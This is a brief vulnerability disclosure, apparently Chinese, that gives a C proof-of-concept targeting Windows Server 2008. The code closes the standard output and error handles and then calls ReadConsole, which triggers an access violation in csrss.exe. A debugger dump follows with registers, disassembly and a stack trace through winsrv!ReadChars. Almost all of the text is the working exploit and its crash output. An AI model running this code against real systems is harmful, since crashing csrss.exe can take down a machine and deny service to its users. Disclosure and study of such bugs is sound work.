影响:
windows server 2008 r1
exploit:
int main(int argc, char *argv[])
{
DWORD foo;
char stuff[10];
CloseHandle(GetStdHandle(STD_OUTPUT_HANDLE ));
CloseHandle(GetStdHandle(STD_ERROR_HANDLE ));
ReadConsole(GetStdHandle( STD_INPUT_HANDLE ), stuff, 5, &foo, NULL);
}
原因C:\Windows\system32\csrss.exe访问冲突
地址756DB6A1 写入无效地址0000000C
eax=015c0da8 ebx=00000000 ecx=00000000 edx=015c14a8 esi=00000000 edi=015c0dc8
eip=756db6a1 esp=0083f5d0 ebp=0083f6a0 iopl=0 nv up ei pl zr
na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
进程基目录表1F187040不匹配CR3 1F187360
001b:756db6a1 ff460c inc dword ptr
ds:0023:0000000c=????????
756db6a1 ff460c inc dword ptr
756db6a4 8b8d54ffffff mov ecx,dword ptr
756db6aa 898570ffffff mov dword ptr [ebp-90h],eax
756db6b0 8a8059010000 mov al,byte ptr
756db6b6 8845b3 mov byte ptr [ebp-4Dh],al
756db6b9 8a471c mov al,byte ptr
756db6bc 66834da4ff or word ptr [ebp-5Ch],0FFFFh
756db6c1 66834da6ff or word ptr [ebp-5Ah],0FFFFh
ChildEBP RetAddr Args to Child
0083f6a0 756dbd5e 015c0dc8 015c0da8 002a0058 winsrv!ReadChars+0x3c2
0083f6f8 757359e4 015c0da8 0083f80c 945f0621 winsrv!SrvReadConsole+0x102
0083f86c 76f77ca3 00000000 7781fc7b 00000000 CSRSRV!CsrApiRequestThread+0x3b1
0083f8ac 76f9e489 75735633 00000000 ffffffff ntdll!__RtlUserThreadStart+0x35
0083f8c4 00000000 75735633 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b